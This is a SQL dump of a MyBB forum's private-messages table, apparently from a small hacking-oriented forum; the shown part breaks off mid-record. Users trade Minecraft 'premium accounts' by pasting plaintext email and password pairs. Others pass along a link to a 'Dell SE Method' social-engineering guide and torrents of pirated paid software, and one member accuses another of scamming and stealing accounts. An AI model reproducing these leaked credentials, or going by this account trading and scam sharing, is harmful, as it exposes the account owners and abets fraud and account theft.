minecraft account ', '0', '[quote=\'iTzIpod\'] [quote=\'XxTREYZxX\'] hey iTzIpod whats doing i\'m here for that minecraft account thanks:) [/quote] wildwill4811@ymail.com:yomama Username/Email:Password [/quote] whats the pass word', '1350262050', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3403', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'MINECRAFT PREMIUM ', '0', 'would you like a minecraft premium i been giving alot away lately and i forgot to give you one. :O ', '1350608952', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3162', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5 [/quote] Use retailmenot.com for coupons. [/quote] Should I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608 [/quote] Last used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work. [/quote] Where is your domain registered at?', '1350262560', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3166', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that minecraft account ', '0', '[quote=\'iTzIpod\'] [quote=\'XxTREYZxX\'] [quote=\'iTzIpod\'] [quote=\'XxTREYZxX\'] hey iTzIpod whats doing i\'m here for that minecraft account thanks:) [/quote] wildwill4811@ymail.com:yomama Username/Email:Password [/quote] whats the pass word [/quote] yomama [/quote] yeah thanks i just relized', '1350263379', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3401', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'it does work ', '0', 'username:the.big.d.man@hotmail.com password:chicken737 log into minecraft.net first screenshot:[img]http://grab.by/gRWK[/img] see it does work stop telling me it doesnt work when just logged into it?', '1350604402', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3225', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'To?', '0', 'Just wondering why reborn is mod when you said he was banned forever from it. And I think we should implement the rule no post and pm threads. :3', '1350356290', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3177', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'hey HELP', '0', 'hey whats up, i would just like to say LH has been very inactive and was wondering if you want me to promote it.', '1350278627', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3179', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey got a question....', '0', 'Is it ok if I advertise my monetizing forum on LH? It\'s basically a forum where people can go to check out all the awesome methods of making money and shit. And track their profits on the site and try to get to a large sum of money. It is in no way hacking or anything like that related.? Would that be alright? And I am also looking for staff so if you know anyone :P :P :P :P', '1350280623', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3181', '205', '257', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: Check out the gamers section', '0', '[quote=\'?(???)?TREYZ?(???)?\'] hey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks [/quote] Hey mate, I shall check It out. I\'m not a Gamer, but will try to relate to what\'s there. Cheers.', '1350297523', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3398', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\'] [quote=\'iTzIpod\'] [quote=\'?(???)?TREYZ?(???)?\'] hey here is that premium account please dont change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) [/quote] 1. Can you fix your grammar? 2. Account doesn\'t work. 3. Even if it did, I can\'t change the password because I have to have the answers for the security questions. 4. No asking for rep. 5. Rating threads are disabled. [/quote] anwers to yours 1.ok 2.it does i just logged in and it worked fine 3.just making sure 4. i said rep if i helped you im not telling you to 5. just realized that and the account does work try again [/quote] Do you know what fixing your grammar and spelling means? :/ 1. You still didn\'t do. 2. No it does not work. 3. Yeah I\'m correct. 4. Still it\'s still considered asking for rep. 5. Okay.', '1350599178', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3183', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5 [/quote] Use retailmenot.com for coupons. [/quote] Should I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608 [/quote] Last used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work. [/quote] Where is your domain registered at? [/quote] Netfirms. [/quote] Okay I might register surpriseforums.com or .net ', '1350310349', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3185', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Monkey', '0', '[quote=\'t3h jok3r\'] Thanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. [/quote] I deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it', '1350315332', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3187', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'ƒ???????????g\'s Dell SE Method....', '0', 'can i have this? thanks in advance bro.', '1350321944', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3189', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: ƒ???????????g\'s Dell SE Method....', '0', '[quote=\'R?????zo?\'] can i have this? thanks in advance bro. [/quote] yep here you go.... http://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324840', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3191', '222', '257', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Hey', '0', 'Here is the guide bro.... http://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html', '1350324890', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3199', '228', '1', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Tnx', '0', 'Thanks i will do my best to get LH to the TOP :D ', '1350330047', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3201', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey...', '0', 'you should make me staff :P', '1350330167', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3396', '3', '222', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Custom Pastebin Source Code', '0', 'Here you go, enjoy http://www.mediafire.com/download.php?bhiaiyz3op0d2go', '1350598707', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3205', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Monkey', '0', '[quote=\'t3h jok3r\'] [quote=\'NXK\'] [quote=\'t3h jok3r\'] Thanks for keeping an eye out on Monkey and what site was he advertising? Link or name please. [/quote] I deleted the post, So I can\'t remeber what it was. But it had ads for anarchy forums all over it [/quote] So basically it was @narchy? [/quote] Pretty much.', '1350339663', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3394', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: that premium account ', '0', '[quote=\'iTzIpod\'] [quote=\'?(???)?TREYZ?(???)?\'] hey here is that premium account please dont change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) [/quote] 1. Can you fix your grammar? 2. Account doesn\'t work. 3. Even if it did, I can\'t change the password because I have to have the answers for the security questions. 4. No asking for rep. 5. Rating threads are disabled. [/quote] anwers to yours 1.ok 2.it does i just logged in and it worked fine 3.just making sure 4. i said rep if i helped you im not telling you to 5. just realized that and the account does work try again', '1350595563', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3207', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5 [/quote] Use retailmenot.com for coupons. [/quote] Should I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608 [/quote] Last used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work. [/quote] Where is your domain registered at? [/quote] Netfirms. [/quote] Okay I might register surpriseforums.com or .net [/quote] I would recommend .net because it\'s more safer. [/quote] Okay, I will go with .net Could you send me $3 please?', '1350339665', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3390', '257', '82', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'that premium account ', '0', 'hey here is that premium account please dont change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) ', '1350594781', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3392', '82', '257', '82', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"257\";}}', '2', 'Re: that premium account ', '0', '[quote=\'?(???)?TREYZ?(???)?\'] hey here is that premium account please dont change the passwordddddd username:the.big.d.man@hotmail.com password:chicken737 please dont change it. please say thanks on the thread rep me if i helped you and rate the thread if i helped you dont change the password pleaseeeeeeeee or you this preivelige will be taken off you and i will -rep you :) [/quote] 1. Can you fix your grammar? 2. Account doesn\'t work. 3. Even if it did, I can\'t change the password because I have to have the answers for the security questions. 4. No asking for rep. 5. Rating threads are disabled. ', '1350595041', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3211', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Domain Register', '0', '[quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] [quote=\'t3h jok3r\'] [quote=\'??????????¢™\'] Yo bro, I was wondering if you had a credit card or debit card linked to your paypal? I am trying to register a domain name from here http://www.networksolutions.com/domain-name-registration/PS-domains.jsp?siteid=181&channelid=P13C181S570N0B9A1D761E0000V118&promo=NCDISC0020&gclid=CPGLh-yl_bICFZGPPAoddykA8w&clickid=1775329792 but I need a credit card or debit card on my paypal. I will send you the money or you could just buy it for me. [/quote] Looks like a scam anyway I only use a unverified canadian PP [/quote] Oh, could you find the cheapest place to buy a domain name or get a coupon for me please? Thanks [/quote] Netfirms: LOVE Namecheap: $4 domain registration for one year with free whoisguard protection. [/quote] The domain I want says 10.69 a year on namecheap. [/quote] Uhh I have no idea. [/quote] That is weird [/quote] They making fake promises lol. [/quote] LOL yea they sure are [/quote] I spoke to them and they said it\'s the STARTING PRICE. [/quote] Damn wtf, I dont have money like that I only have $5 [/quote] Use retailmenot.com for coupons. [/quote] Should I use this one to see if it works cause its kinda old. http://www.retailmenot.com/showcoupon/1395608 [/quote] Last used 10 months ago and 2 years old. Then it\'s a private coupon by someone who is an affiliate member on their site so there\'s 95% chance that it would work. [/quote] Where is your domain registered at? [/quote] Netfirms. [/quote] Okay I might register surpriseforums.com or .net [/quote] I would recommend .net because it\'s more safer. [/quote] Okay, I will go with .net Could you send me $3 please? [/quote] Just wait a couple of days because then I\'ll get some money from adf.ly, I don\'t have money because I use my dads card and he is in another country so it\'s expensive to convert into dollars so I use other sources to earn. [/quote] Oh okay', '1350343407', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3213', '257', '1', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: hey HELP', '0', '[quote=\'t3h jok3r\'] [quote=\'?(???)?TREYZ?(???)?\'] hey whats up, i would just like to say LH has been very inactive and was wondering if you want me to promote it. [/quote] Sure, I would appreciate it. [/quote] started:)', '1350346910', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3215', '257', '205', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"205\";}}', '2', 'Re: Check out the gamers section', '0', '[quote=\'mothered\'] [quote=\'?(???)?TREYZ?(???)?\'] hey man whats up come look at some of my post at the gaming section, the gaming sectin is kinda inactive ATM there about 5 of us that are active in the gamers section.thanks [/quote] Hey mate, I shall check It out. I\'m not a Gamer, but will try to relate to what\'s there. Cheers. [/quote] thsnks ', '1350347056', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3217', '257', '222', '257', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: Hey', '0', '[quote=\'ƒ???????????g\'] Here is the guide bro.... http://www.2shared.com/document/BA-L8EKU/JinXersDellSEGuide.html [/quote] thanks man', '1350347414', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3219', '100', '228', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"228\";}}', '2', 'Wow', '0', 'Hey just wondering- how did you get mod so quickly..?', '1350349375', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3221', '228', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Google Sniper 2.0', '0', 'Hey, Sorry but i can\'t upload it with dropbox, so thats why it\'s a torrent. :D Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0 Enjoy your Google Sniper 2.0', '1350349659', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3223', '228', '100', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Mod', '0', 'Ask it to the big boss :P ', '1350349729', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3233', '228', '53', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"53\";}}', '2', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0 It\'s a torrent file!', '1350386957', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3235', '228', '62', '228', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Google Sniper 2.0', '0', 'Download Link: http://tpb.anonhi.de/torrent/6555567/Google_Sniper_2.0 It\'s a torrent file!', '1350386988', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3237', '254', '82', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"82\";}}', '2', 'Re: You\'re Funny', '0', '[quote=\'iTzIpod\'] I see you were on the AQW account earlier today. I hope you are enjoying the AQW Account + the MC Account. Because you sir. Scammed me... You simply went on your email. And then clicked saying that you did not make this request. And changed the password and the email. Using your Master Account. I can tell you logged on the account because 1. I was never equipping those items. 2. My password is incorrect. You changed it obviously. 3. My email was changed also. I can\'t recover the account using my email. 4. You didn\'t go on Skype talking to me explaining what happened or anything. 5. You scammed me. :) Enjoy the accounts. [/quote] What if, hear me out, what if My computer was hacked, everything I owned all my accounts and I took all my time to get them back? And no I couldn\'t of gotten it back through that email, because that email confirmation was already used and couldn\'t be used again. The hacker got hold of my email, That holds every single payment purchase I made. I found out this yesterday that you could change the email by the transaction Id of the purchase, So it\'s not under my email no more. I had to redo my whole computer and every single of my accounts I had. You know how bad this sucks? I have to go around installing lots of crap onto my god damn computer! And I\'m fucking pissed. I\'ll talk to you later but right now I got work to do. ', '1350394035', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3240', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'GFX Question', '0', 'Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D', '1350402659', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3242', '254', '1', '254', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Just ban me', '0', 'If there not going to listen, just ban me I have a lot of things to do like recovering all my accounts and my credit card from a hacker. So i\'ll see you when ever.', '1350404662', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3244', '62', '100', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"100\";}}', '2', 'Re: GFX Question', '0', '[quote=\'??zg???g????61\'] Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D [/quote] it\'s called adobe photoshop CS6 (the newest one) probably the easiest one too.', '1350408147', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('3247', '100', '62', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: GFX Question', '0', '[quote=\'R?????zo?\'] [quote=\'??zg???g????61\'] Hey man, so I want to get into some GFX and was wondering if you could send me the program you use to make stuff. I\'m assuming its an adobe product? Thanks for your time, I\'m really new to this. ;D [/quote] it\'s called adobe photoshop CS6 (the newest one) probably the easiest one too. [/quote] Oh photoshop? Did you buy it?! 0_____0', '1350413778', 